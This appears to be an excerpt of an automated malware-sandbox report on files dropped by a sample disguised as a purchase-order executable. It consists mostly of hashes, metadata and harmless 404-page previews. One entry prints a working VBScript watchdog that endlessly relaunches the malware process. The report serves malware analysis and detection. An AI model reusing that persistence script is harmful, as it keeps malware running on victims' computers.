                                                                                                                                SHA-512:F3C15625C4B8C2720D70ADC0439C65C8874889243D6EBF612F4BC640184F1B87DA67F5FEF377A7AA7104BCB7B1F5CF7F5347FB4893123794E9356FF07435D4D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FVHbTkYvcRKJuArgaAZrmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.259313372465236
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0J6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W6+pAZewRDK4mW
                                                                                                                                MD5:90868BA64AC999A183477802BAF6BFBA
                                                                                                                                SHA1:C72B147A1917FE2A040976393DC7060F95D45314
                                                                                                                                SHA-256:EAFC5A2CD2ED6B7D6A0FA30EE9F291BF842C04D79E12E381BC834530723E86A9
                                                                                                                                SHA-512:9CF4D92DD7093FBAFE91922452D12646EC9B4691B0C51BF3855A4DAF420176D122D29DF5B3541E9AD87CE8691B6A962E6E41F11763420EC44A3AFAB93652535F
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9HrVOhBr_7rwQFdXzdh2Lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.269430840877484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0u3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z3+pAZewRDK4mW
                                                                                                                                MD5:D3758A9FD698C118B3390BE5B1C4A790
                                                                                                                                SHA1:76396CC185D8E739A883B1719B1ADF5BC0A4A7B5
                                                                                                                                SHA-256:20336060469E026B7E6C1DB65BC5DD903E08574B62C1B7282D6DC5FE5C1AEFC1
                                                                                                                                SHA-512:3CAB8B2282FBEFD884881FC12AA749700D707C5D38FC5EC3CDE7A90CFFD654A4F2A45DC09818C2121993BD754F0D5CC6551926C38129B24EB7A894B0C889AD12
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kg4bYPLhWYnk2ARQ_KX9wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18387
                                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2673668674046015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                MD5:DF467707BDB19CF1B3588EC87DEABC29
                                                                                                                                SHA1:3E77F78CC280B6C230CBE1FFA947DCFB97426412
                                                                                                                                SHA-256:BA30462031CB8A782C03C3DCAF2D093898E539BD6453CEBDC7B3621DA389675E
                                                                                                                                SHA-512:F6D090AA412FC1F28C48BD6A5D5FB6DBAD5C4213534F74440A0EF360EBDAFEA30D8B4CFBF536D1A723A94B2A6EA197180844120CBB5A1571EEEAFC5BF80754BB
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.270320893930298
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                MD5:B9C79B6F73C663D635E8D901A464869F
                                                                                                                                SHA1:648CA65ABC79C8B9233CBDE620E1970A51616979
                                                                                                                                SHA-256:2AD37FCE12324AB5C7D56E47B6927F092520489771B8B7E90E78A19EF4517A46
                                                                                                                                SHA-512:F4A88E4B87AD9014AAE53FF72BA138F2806154F62C40C45F968FAE091340926A3EA3A0B7B92E0E3867FDCADA243010D3459191C6CF25F96CD04271D3D9C40CD0
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.268532009428551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                                MD5:D650ACFA8EC6F228B766E0404B355322
                                                                                                                                SHA1:70588F896D48302674F89291848E984DC880FD41
                                                                                                                                SHA-256:C08A0F6A34C150314231100816E2BDAB855D9892379AAADAD896DB3D95AFBD3D
                                                                                                                                SHA-512:C6C2A407A04C02E85098F180BB4B97BCCF7B242C5F30A5AB89ACDF60122EF2163EE24702FBAF53B4F7C5B59EED7392C4A6CA8EFB25CC3AEA72AD183F0ACE4B22
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266916735963596
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0vfP3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                MD5:94F4B644FC20F7156DC6FBB6EAB98CE7
                                                                                                                                SHA1:7A6C90C0C7B16CAC20B81E8C9CED10625BE48241
                                                                                                                                SHA-256:A8A0565322CE2D5F91B4FE46E067A2F7A2E555E8ADC57ACB3DD99F0E3C85849C
                                                                                                                                SHA-512:B29AE55DC3282E0E3F0C908636E16BDEBB59EBD47D03417E2584FEDE4DBDAD291B30393930ABED786059E9E321E4C98590890D1E1C9554DEB2D555469CC8BD75
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.279469425016549
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0cBESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dBE+pAZewRDK4mW
                                                                                                                                MD5:5CC0102B6FC06763DA0F77FC71C49D5E
                                                                                                                                SHA1:9472E44AB7788798395BEAAC8C336687C6593F67
                                                                                                                                SHA-256:5B19EC09BDA1C78E80B65F0A77FB9AA63D601F8063D80994CD6DDCAECA8A6335
                                                                                                                                SHA-512:A9FA85C8B112CED465F0E327F6B2DBC3FC11FC7A7FE94DF37DF24BB539369FA07FA0A034D8E4ACE991AAA460E4C9D3484C05575922E3AE76B5BCA15F4ACAF8F1
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.255768344641617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0ROSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                MD5:D6F34690512671DD7F32067967C8E88B
                                                                                                                                SHA1:D7C1D9394283D09A0AE2314AB359AB776547C074
                                                                                                                                SHA-256:8526BF6BCAA48CBF9C1C80ABE54AED2BB4E6432E8B29DAAB9CA6EFCB43DF0FCF
                                                                                                                                SHA-512:5CC7E1EEE20A650E5FE9DD1D9B5E0943636E74FE5501C01577941E770922F3B53C1E5F8B9745B26EA123B6D5C92CE449A9C2204B0626C261DCEF164C4EEC0014
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.267622395812817
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                MD5:0568E1BA4CF633346EFE3A6B13E0BB7F
                                                                                                                                SHA1:3CF9E301191924423CA6392912B69938E357AE6B
                                                                                                                                SHA-256:47785D5EED4C1E3EACC61B04B81CAFF4EE1B101DD8FC04FAD2FBD0F00AD5DD05
                                                                                                                                SHA-512:2E6636F32570045FB4ADA8F3FB9EAB5A89A3F91F47B1F8081CBCDB13EE4DEF733198338D3E4D2E4701F124330176B4EA458DED3A51FE86BC884C17BF09982846
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.271301677933788
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+01TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cT+pAZewRDK4mW
                                                                                                                                MD5:92FBC0B5A4A3FD391253B32FE47461AD
                                                                                                                                SHA1:FE24538A1A71D5949D6D9CD6EA3E81232BADF766
                                                                                                                                SHA-256:D7D767BD352A9AF756D4F8CA797EFE287E4F8B0B03D5D6C92205280BF2EA4511
                                                                                                                                SHA-512:E046511FC9822771DAD5511DC84BE0F9592DD91480CD7D5D46A9DA6123F4688CCA77B66752798E8F2FEEDB9C7408BBE1AB44C679B08398E630C36C366BC6EB97
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):883
                                                                                                                                Entropy (8bit):5.379605100781023
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:dF/UFy7nOU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF4t+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                MD5:567D5CCC75C3E45259AC6D76AD3C2AF5
                                                                                                                                SHA1:65315386939AF674B9578E11EB967035F2D88709
                                                                                                                                SHA-256:86F8DCE3E13A624FBA879DDC1851D8AB7029D7461F9DA488E208B04123098D56
                                                                                                                                SHA-512:4A6332EF3D1620EAD1C3B27EBF9074A12107BFAA3C4AC5E833306EE510D297A918E5D5B96D02CEEF919524C55B80A136423BD5F316D4D2F7CFB4CEB3DF23D356
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:
                                                                                                                                On error resume next
                                                                                                                                Dim strComputer,strProcess,fileset
                                                                                                                                strProcess = "._cache_New PO - Supplier 0202AW-PER2.exe"
                                                                                                                                fileset = """C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"""
                                                                                                                                strComputer = "."
                                                                                                                                Dim objShell
                                                                                                                                Set objShell = CreateObject("WScript.Shell")
                                                                                                                                Dim fso
                                                                                                                                Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                                                                while 1
                                                                                                                                IF isProcessRunning(strComputer,strProcess) THEN
                                                                                                                                ELSE
                                                                                                                                objShell.Run fileset
                                                                                                                                END IF
                                                                                                                                Wend
                                                                                                                                FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
                                                                                                                                DIM objWMIService, strWMIQuery
                                                                                                                                strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
                                                                                                                                SET objWMIService = GETOBJECT("winmgmts:" _
                                                                                                                                & "{impersonationLevel=impersonate}!\\" _
                                                                                                                                & strComputer & "\root\cimv2")
                                                                                                                                IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
                                                                                                                                isProcessRunning = TRUE
                                                                                                                                ELSE
                                                                                                                                isProcessRunning = FALSE
                                                                                                                                END IF
                                                                                                                                END FUNCTION
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.263489809786905
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0GWESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hv+pAZewRDK4mW
                                                                                                                                MD5:D0AAC54F2AF61529FD6240AB3757A95A
                                                                                                                                SHA1:6418B73F125AA509DBA2D564362128BA730B0437
                                                                                                                                SHA-256:6EDB45417AC64A5F296F2DD9C25A341599D0EDC36ADD3F87DBB371D601F4D128
                                                                                                                                SHA-512:4D68B4EEC39F5EF2B9A6BB95F2CE9AEFDF168F47B267323580929F217524979EAEED9D3BA01B927454E111F1031AD5D4F076594458BF252819E8014573CD551D
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KpJoM1tp4AdK6WfzpN8FwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2616705276434805
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+07ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                MD5:FA36B706011446AC6345950FDF14AAE2
                                                                                                                                SHA1:586F265A6A60A05A93F5B9164B2598C4A5867423
                                                                                                                                SHA-256:10497E784E87D92E87764FAB7751CC9788F083B217E248571BBBCA72A4E59164
                                                                                                                                SHA-512:7C53A16CD274DE511AE7B732DB1F472E11CD69F37D1AB431D9E56E99CCB56E1982E7358AB30B715130B359278E6FC9735CE5471B2CC564F89FA5191F56F588B6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.245110820911036
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0hhSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                MD5:24AA2BD42FB5C8A6038FAF27B8E4EE17
                                                                                                                                SHA1:EE4B14614D0F3C7753F997BD1AC03405E677A3DB
                                                                                                                                SHA-256:351D4A8F3A9102F8F9494CBB53377CABE2B9A2A235E2CB5860985E241A479464
                                                                                                                                SHA-512:D07D806ED9701EC0C66677D25FD2296D4BC7B7A1EF98D0FAC95FFBC1BDF7EA8A3D142735D038237BCF18732B68F6A47AAFD74DB6E5DD6227897302991B4360D1
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.270913072926747
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0bbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2b+pAZewRDK4mW
                                                                                                                                MD5:E55566DC48DE8B0650CB4E94B509480A
                                                                                                                                SHA1:E496918D1C68C1E063F826AFF3F1EA494DD53CBD
                                                                                                                                SHA-256:8AB1A58C226BE111030D47202E6A02691F693F19F692222B1802A0211F3E9190
                                                                                                                                SHA-512:A80E96359194744345784607697A4123F57D29E1133594C9E01168BE18798BFE3FDCDA79B6DC50F3BC83B12B1D04751389E996B3CFD9E53FDC1F5C13E2A2ED05
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.265152413268958
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                                                MD5:FFFC9F4054A1F584B6786C6824CBE4E1
                                                                                                                                SHA1:111EFB17C993E309A49852B029113096A74CF7BF
                                                                                                                                SHA-256:24E70157BD053E84D4A9BB116491A07EC9E8F1AF15FFB095A3FD7011DB3C9CA1
                                                                                                                                SHA-512:FCD2806417C175120916D81AFF2A3A00F579B7207E314C0D7DBA1819F8560B07F371C07B11A19A6CAC9C111BB30EDE8A301FC29C8C60A2036F750B210CAF3909
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.250758070345881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0jrTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                MD5:C0FC13C53B6A8C6075A80027DFB19139
                                                                                                                                SHA1:0C64F40CCE37392DE00F10B309C5502996EF7D60
                                                                                                                                SHA-256:F42F9EB39D0C5942BDE818CB987708C8F289A7F52ED6A37FCBDB9FF0FD28100B
                                                                                                                                SHA-512:BBF035A58D3898CEDFA3081165A849332FCB946AF3E8210A48B59E27CD47806EDD41CFDD81B3B10902223405D5F810AF75C29691713C5C1AD2618BBDE354F887
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.267369662130189
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                                                                MD5:F9F11E6BEFAA295812D629FC1E80BF25
                                                                                                                                SHA1:2979947AA27745FDBDF84E14E016ACC7808D5F52
                                                                                                                                SHA-256:AB75A6589D59C5CDFE6BDB6540B7F67596C11E5864221FAF3CFB5CE4638FC359
                                                                                                                                SHA-512:65FDC0AE34027F80061EC39CB98281CAF8A59597DFE5AEC86815C27DC43E2FF5A34C606DDB4DE6AF53C4662280ECB71FAEB60C43FF58A052ADDEF4603CC11DA7
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2544016966583555
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+06ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+fI+pAZewRDK4mW
                                                                                                                                MD5:9305FF31A44395097FB02E3807B4F5AB
                                                                                                                                SHA1:18E568ED797453FA1E454620AEF572979C61FE6A
                                                                                                                                SHA-256:10FF7BAF8299A80703AB27B5EFF6620B58173F6C4AA8DCE616EB6F6891ADA28F
                                                                                                                                SHA-512:37939FEA3C500DC29F8C717FE31517E2E607C35CF21313B75AD41B62FD595B31CE87A4B2F830287EADDF5B72206A8A31E98F29CF8A70F8C8BA627511097BD2F7
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.260273217625656
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0DgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                MD5:77E43CCB49C48F39F7351E14FD450978
                                                                                                                                SHA1:B765B65DD9AB67BC69346BFB5C6945AED74E4E7E
                                                                                                                                SHA-256:24C9B132935436977843125DAC55EE18F99EAF03F5F1DA8523FCA8AA910BF27A
                                                                                                                                SHA-512:50D881B17A5C5D77D88EF8891734353992548FA30EF4C821F8A8E32BA30F49D996B88E9CB5D9D37C6456633EF0783D16CC65CBB1F805653793FE654934D842EF
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.261031432368457
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+00G/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+92+pAZewRDK4mW
                                                                                                                                MD5:6653D351FA23AE4A974B0BEB8D73917B
                                                                                                                                SHA1:33AE0E602B58A964A79AE15AA9625C52E16912DD
                                                                                                                                SHA-256:67AE455BCA608C75226AEA89E8B3D3C274451ED159F50EA0D33562CA3BA462C6
                                                                                                                                SHA-512:D9C6A11C5402F0C842E710002C44D407BED4D48DFDF00A7846B1C64225B32FAECC700F474E27E440343DFBA3C783F34C2B50E569A73E7A27F8FEB90336DBF828
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2684504593235655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0vUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+UU+pAZewRDK4mW
                                                                                                                                MD5:80D433E46654D03141E50D4C2742BD32
                                                                                                                                SHA1:DF4451B8B3B28CE0E20328264E51E82703F8F893
                                                                                                                                SHA-256:FCE4173744662D3444EC68990872CECBAD208C423C9D042AA04715F9D94CC980
                                                                                                                                SHA-512:A7D216EE862075991E5F810D3B75329E86BFE563F091F4A9C2FD81FC7444963319EA581C3880C30BDC11659D6EC6F8ADDAC94ED8DC5B0C0C361F2A67BB15F3C0
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l9Q3hhjk1jSPgFjvqw39OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):165
                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
